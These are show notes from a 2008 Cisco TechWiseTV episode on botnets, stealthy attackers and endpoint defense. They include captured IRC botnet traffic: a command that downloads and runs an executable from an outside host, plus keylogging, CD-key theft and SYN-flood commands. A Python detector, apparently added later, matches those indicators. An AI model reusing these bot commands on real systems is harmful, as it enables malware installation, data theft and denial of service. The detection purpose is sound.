
27 Invisible Attackers

Invisible Attackers - TechWiseTV (TechWise TV episode 27)
Invisible Attackers: Stop the Bot
Show Notes
Air Date: January 10, 2008 Watch the Replay


Synopsis
Segment 1 – Hiding in Plain Site
Segment 2 – Understanding the Botnet Threat
Segment 3 – Endpoint Enforcement with CSA


Links:
Control Security Threats
cisco.com/go/csa
CSA Flash Demo

Get a look at the Q&A from the live show...attached at the bottom of this page.

Synopsis
It is often what we don’t know that can hurt us the most. Security challenges continue to evolve as everyone gets smarter and the stakes get that much higher. Security is like a chess match where every move provokes a counter move and as we have gotten more intelligent with our defenses, malicious attackers have continued to evolve as well. Now that the focus has shifted from fame to fortune, today’s attacker finds it most advantageous to remain ‘low on the radar’ if not completely invisible. Today’s malicious hacker follows a straightforward credo: “The less you know about my tools and methods the longer the shelf life and the greater my haul.”

In typical TechWiseTV fashion we pull back the curtain to reveal how today’s smart attacker is using common tools and old-fashioned smarts to accomplish lucrative new goals with YOUR network and YOUR systems.
We promise new insights into 7 critical areas:
1. How attackers are hiding in plain sight and what you can do to ‘flush them out’.
2. How attackers are using normal system features to perform abnormal and malicious acts.
3. 6 simple things you can do today to severely limit someone’s ability to cover their tracks.
4. The incredible rise of the botnet, evolution of their malicious code, and why the economics make so much sense.
5. The feedback loop that perpetuates spam, worms and botnets and how to avoid becoming an enabler.
6. How attackers are using indirection to communicate freely in and out of your network.
7. Where you can start construction on a dynamic and intelligent defense plan from the inside out.

It’s episode 27 of TechWiseTV: Technology you can use from geeks you can trust

Funny sometimes how things tend to take on a life of their own. This show was an idea Robb and I had for a podcast. As we were working out the details, Robb came to the realization that we had a TechWise show on our hands. That is the relationship Robb and I have. I am a geek. I can tell disjointed fishing hole stories all day long. Robb is a visionary. He listens and puts together a vision and action plan out of this stuff, and a show is born. Amazing really. This is really how BotMasters work also. (Sorry Robb…) They take the disjointed fabric of the Internet, weave a business plan into it and before you know it, a new idea is born out of the thoughts of many.

Segment 1: Hiding in Plain Site
Ever go up to someone wearing camo and say something dumb like, “I can’t see you”? I got punched in the head one time for that. (I didn’t know Robb was so sensitive about his wardrobe…) I have been to many hacker conventions and it is easy to spot the noobs, because they tend to brute force their way into systems, being noisy on the wire and breaking many file dependencies to install their own crapware. This type of behavior is great for firewall/IDS demos and Hollywood, but with respect to them, in a demo or movie time is our enemy so we have to get to the point. Please do not confuse demos and movies with reality. Time is on the side of the hacker/bot herder. To keep that advantage, they have to hide in plain sight. Of course encryption is what many folks drift to; truthfully, I prefer my bot herders to encrypt data. I can spot encrypted traffic easily on my network and react to it fast. The scary stuff is hiding files with ADS (Alternate Data Streams) and then calling those files with HTTP. Microsoft has a free tool called Streams that you can download and use to check for these streamed files.

Screenshot of the file we streamed on set and how the Streams utility caught it:
[Screenshot: Streams utility output]


The trick is to make sure you specify the search path or it will not work. Of course we also have covert channels, which are also a threat. These started with a simple ICMP tool called LOKI and they have improved many times over since then. CC (as they are called in cool circles; like the 501st Stormtrooper meetings…) now use HTTP, TCP and ICMP as transports to funnel information back and forth. Remember, bots are dumb and they need to send information back and forth to work. One of the hiding in plain sight methods we did not discuss was steganography. This is kinda like streaming a file behind another file. Folks are using this “watermarking” process to hide MP3s and porn behind legitimate pictures. Check out the difference between these two files:

[Image: Normal picture] [Image: Carrier picture with hidden .txt file]

Amazing stuff, isn’t it! This is such an awesome field to be working in!! (If you can decode this, it has Robb’s Christmas list and home phone number… use the discussion thread below if you think you figured it out.)

Segment 2: Understanding the Botnet Threat


It is tough to understand the real threat without REALLY understanding the why. Robb said it best on the show: “Why do folks rob banks? Because that is where the money is.” I use that analogy when I give a presentation on hacking network switches. Why hack a switch? Because that is where the data is. Botnets are for plain old money. Money is the motivation, and a botmaster will do anything in their power to stay hidden to keep that 67 billion dollar money stream flowing. To understand the threat, let’s get some terms straight first:

Virus: is NOT a bot. A virus is normally self-propagating and needs no central command to tell it what to do. It is programmed for a course of action. Kinda like The Terminator: “Hasta La Vista, HOSTS file….”

Bot: is NOT a virus. A bot is a very small piece of modular code that must be controlled from somewhere by someone. Since the code is modular, a bot herder can add and remove functionality as needed. Very well coded, and normally cannot be detected by drops in system performance.

Hacker: Without getting into the “a hacker used to be this or that” or the color of headwear debate… A hacker normally breaks into a system for the purpose of controlling (or owning; hacker speak: 0wn3d) a system. Sometimes for fun, education or meanness, but normally they want total control of your network.

BotNet: A collection of bots controlled by a bot herder to form a network that is a pain for all of us. This is usually thousands of bots all over the world.

Bot Herder: These folks control a large number of systems (mainly PCs) via a bot. They normally have very poor coding skills and are using the modularity of bots to design their own creation. Here is a GUI for making your own bots from the Agobot base code:
[Screenshot: Agobot GUI configuration tool]

How easy is that! A bot herder is NOT a hacker. Bot herders control botnets. Here is a sample of a botnet controller I took right off my own darknet:

IRC Channel Join

-> PASS D3&hh*
-> USER CC-5644 * 0 :IMP1
-> NICK [T11|USA|51932]
<- :sv2.bothost.net 001 [T11|USA|51932] :
<- :sv2.bothost.net 002 [T11|USA|51932] :
<- :sv2.bothost.net 003 [T11|USA|51932] :
-> JOIN ##tshuab l3a9
<- :sv2.bothost.net 442 [T11|USA|51932] ##tshaub l3a9
<- :sv2.bothost.net 443 [T11|USA|51932] ##tshaub 6h057
<- :sv2.bothost.net NOTICE [T11|USA|51932] :*** You were forced to join ##gt
<- :sv2.bothost.net 442 [T11|USA|51932] ##gt : .get http://www.net.nu/tort.exe C:\WINDOWS\system32\tdmk.exe r h

Bot Creator: These folks are super good code jockeys. They think outside of the box and really can do a whole lot with very little. They actually design the original bot (base bot). They are rarely caught or known.

Spyware: Typically is not a bot per se, in that they do not have a central command and control. Spyware gathers info and reports back. Normally very poorly coded and can be detected by watching system performance drop.

In the wild, there are only about 10-20 actual base bots. Those bots have names like AgoBot, XTbot, SDbot, Storm, Dataspy Network X, etc… However, out of those 10-20 base bots over 8000 variants exist. For example, AgoBot alone has over 1500 variants. Those are called Gaobot, Phatbot, Forbot, XtrmBot and a few others. AgoBot itself is very easy to build a custom bot from because it has a GUI configuration interface that allows someone with zero coding skills to build and deploy their own custom bot.

What do bots actually do? Many folks believe bots are more a necessary evil we have to put up with in networking and just look the other way. This is more true in the enterprise than in the home market actually, as odd as that sounds. Bots can do the following:

- Keylogging (looks like this to the bot from the controller)

<@controller>.keylog on
<+[HKL]94877> [KEYLOG]: (changed Windows: AIM)
<+[HKL]94877> [KEYLOG]:hey Dude!(Return) (changed Windows: Robb )
<+[HKL]94877> [KEYLOG]: (changed Windows: Google -Microsoft IE 6)
<+[HKL]94877> [KEYLOG]:fishing season(Return) (Microsoft IE)

- Getting CD Keys from installed software (looks like this to the bot from the controller)

<@controller>.getcdkeys
<+[JPN]12990> Microsoft Windows Product ID CD Key: xxxxxxxxx
<+[JPN]12990> Half Life (Blue Shift) Product CD Key: xxxxxxx
<+[JPN]12990> [CDKEYS] Search Completed

- DDOS Attacks (looks like this to the bot from the controller)
:NEX-7760!.ddos.syn 205.88.xxx.xxx 80 500
USA|387166 ##Lezone## :s[I] (ddos.plg) Done with flood (1525KB/sec).
CAN|112908 ##Lezone## :s[I] (ddos.plg) Done with flood (1080KB/sec).
JPN|286741 ##Lezone## :s[I] (ddos.plg) Done with flood (488KB/sec).
TWN|128976 ##Lezone## :s[I] (ddos.plg) Done with flood (1855KB/sec).
CHN|765512 ##Lezone## :s[I] (ddos.plg) Done with flood (1211KB/sec).
(Notice that the bot reports back the bandwidth actually used!)

Plus bots can also be used for SPAM, Adware installation, Asset tracking, Poll and ad manipulation
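As an added example (not from the show, from Cisco, or from any bot's own code), here is a small Python scanner that applies the bot indicators visible in the join trace and the command logs above to a constructed sample: the country-tagged nick, the forced channel join, the `.get <url> <path>.exe` download-and-execute command, and the `.keylog`/`.getcdkeys`/`.ddos.*` command verbs. The sample is adapted from the page's captures with the download URL replaced by a placeholder, and the regexes are heuristics written for this example, not a real signature set.

```python
import re

# Constructed sample: the page's captured bot traffic, one IRC message per line
# (direction markers kept); the download URL is a placeholder, not the original.
SAMPLE_TRACE = """\
-> PASS D3&hh*
-> USER CC-5644 * 0 :IMP1
-> NICK [T11|USA|51932]
-> JOIN ##tshuab l3a9
<- :sv2.bothost.net NOTICE [T11|USA|51932] :*** You were forced to join ##gt
<- :sv2.bothost.net 442 [T11|USA|51932] ##gt : .get http://example.invalid/tort.exe C:\\WINDOWS\\system32\\tdmk.exe r h
<@controller>.keylog on
<+[HKL]94877> [KEYLOG]:hey Dude!(Return) (changed Windows: Robb )
:NEX-7760!.ddos.syn 205.88.xxx.xxx 80 500
"""

# Heuristic indicators (assumptions for this example, derived from the traces above).
NICK_RE = re.compile(r"^-> NICK \[[A-Z0-9]+\|[A-Z]{3}\|\d+\]")      # [tag|country|number] nick
FORCED_JOIN_RE = re.compile(r"NOTICE .*forced to join (#+\S+)")   # server pushes bot into a channel
GET_RE = re.compile(r"\.get\s+(https?://\S+)\s+(\S+\.exe)", re.I)   # fetch a binary to a local path
CMD_RE = re.compile(r"\.(keylog|getcdkeys|ddos\.\w+)\b", re.I)      # known command verbs


def scan_irc_trace(text):
    """Return (line_no, indicator, detail) for every suspicious line in an IRC capture."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if NICK_RE.match(line):
            findings.append((n, "bot-style nick", line.split()[-1]))
        m = FORCED_JOIN_RE.search(line)
        if m:
            findings.append((n, "forced channel join", m.group(1)))
        m = GET_RE.search(line)
        if m:
            findings.append((n, "download-and-execute", m.group(1)))
        m = CMD_RE.search(line)
        if m:
            findings.append((n, "bot command", m.group(1).lower()))
    return findings


def summarize(findings):
    """Count findings per indicator so a monitoring dashboard can alert on the mix."""
    counts = {}
    for _, indicator, _ in findings:
        counts[indicator] = counts.get(indicator, 0) + 1
    return counts


if __name__ == "__main__":
    for line_no, indicator, detail in scan_irc_trace(SAMPLE_TRACE):
        print(f"line {line_no}: {indicator}: {detail}")
    print(summarize(scan_irc_trace(SAMPLE_TRACE)))
```

A real deployment would feed the scanner from an IRC-aware network sensor or darknet collector rather than a pasted log, and a single "download-and-execute" hit is worth an alert on its own.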

These missions can be added and changed on the fly. The question is why, right? Follow the money… Bots are BIG business. Spammers can make up to $750K per year with bots. They are not zit faced, pizza eating punk kids just trying to be mean. Bot herders are in it for the money. 100% of the time that I have tracked bots there is ALWAYS a criminal element behind it. Please understand, bots are not innocent fun little experiments. This is a big opportunity to make some serious cash. This is the single biggest reason that bots are coded so well. If you can detect and remove them, the bot herder has lost money. Bot herders keep good records and can add and remove modules to appeal to their customer base. Consider that a bot on any of your machines has a “For Rent, Will Customize to Suit Need” sign on it.
[Graphic: drones]
Thank you to the fine folks at www.shadowserver.org for this graphic and the excellent resources.

Bots are kinda like seeing your in-laws pull up in your driveway: if you are not proactive in monitoring, it is too late once they are there. Protecting your network NOW is the key to preventing your data/resources from being used or traded on the dark market.


Segment 3: Endpoint Enforcement

Where does data reside and the potential for damage remain the greatest? The endpoint of course. John Eppich from the Cisco Security Agent Business Unit discusses the tactics used and the defenses you can employ to protect your most valuable assets today.

Cisco Security Agent uses correlation within rules to prevent zero-day (unknown) attacks, as well as known attacks. Being able to tag something as a network application when it touches the network, and applying preventive rules to protect against malicious behavior, is one of many adaptive ways that CSA is able to protect your systems. As an example, bots may target a system via IRC in a controlled manner, or P2P in an uncontrolled manner. The moment an application touches the network, these zero-day, zero-update policies will protect the system from malicious action; CSA does not care about the origin of the attack (IRC, P2P or HTTP).

Bots can also spread and infect other systems by launching a series of exploits targeting the operating system or an application’s vulnerabilities. The concept of correlation comes into play via default preventative rules, whereby CSA can recognize and stop, for example, a remote process that attempts to execute code or perhaps steal information.

The ability to recognize and stop the automatic installation of software can be one of CSA’s most powerful strengths. CSA will prompt the user at any attempt like this so that nothing invisible can be installed in the background (such as often happens with malware) and any corporate policies on such activities can be easily monitored and regulated down to a per user level.

Beyond Zero-Day and Zero-Update Policies, CSA has other pre-built Acceptable Usage Policies to protect your most valuable assets. One such policy is a Data Theft Policy, which allows you to define ‘sensitive data’ and protect it from a variety of risks such as clipboard abuse (cut & paste between applications), unauthorized applications attempting to interact with this data, as well as other potential exit points.

CSA can also establish control and oversight in a number of other areas as well:

- Regulatory Compliance: Assign a PCI Compliance Policy to a group protecting cardholder data, for example.

- Data Center Security: deploy security patches on your own schedule rather than your software vendor’s. CSA’s behavioral protection has historically provided protection against every new vulnerability and threat without updates. This can take you far in maintaining sanity with database, application and other critical servers.
- IP Telephony Security: a headless (no management) version of CSA already comes pre-installed on almost all of Cisco’s call management and processing servers. These can be easily upgraded into managed units for increasing overall visibility and correlation with the rest of your CSA installed base.



Attachment: audience_questions_011008.doc (Word Document - 52k), posted by robboyd, Jan 11 2008, 3:28 PM EST
Q&A from the live "Invisible Attackers" show - Jan 10, 2008